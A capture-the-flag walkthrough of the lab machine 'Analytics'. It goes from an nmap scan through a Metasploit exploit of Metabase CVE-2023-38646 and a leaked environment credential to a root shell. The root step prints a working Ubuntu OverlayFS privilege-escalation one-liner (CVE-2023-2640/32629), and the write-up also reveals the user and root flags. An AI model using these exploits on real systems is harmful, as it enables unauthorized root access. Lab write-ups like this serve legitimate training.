This is my walkthrough on Analytics

First we scan the Machine

nmap -T4 -Pn -v 10.129.85.38

We see port 22 and 80 open.

Browse to the website and we get an error, add the IP and domain to the hosts file.

Now going back to the website we can look around!

Looking around, we see the Login page at the top. Checking that out, it doesn’t work BUT the URL has changed to data.analytical.htb, so let’s add that to the hosts file as well.

When looking we see it’s running Metabase.

Search for Metabase exploits on google as well as in metasploit. I find this blog talking about Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)

In Metasploit we see a potential exploit

Let’s check the options and set them

Send the exploit….

We have a shell! Now let’s see if we can get and run linpeas.

We can! Run it!

We see in the “Environment” section, a user and a password

META_USER=metalytics
META_PASS=An4lytics_ds20223#

Let’s ssh into the machine with the newly discovered username and password.

ssh metalytics@10.129.85.38

Got the user flag! 5f24e4536b318d506fe1a38fbbd959fa

Priv Escalation

I seen we were running Ubuntu 22.04.3 as we logged in.

A simple google search for “Ubuntu 22.04.3 priv escalation” shows me this reddit post about Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629) with multiple references. They list how you can get root using the OverlayFS module with this command:

unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")'

We have root! f35c47aac97cb1a6b5450d4eb024a3cc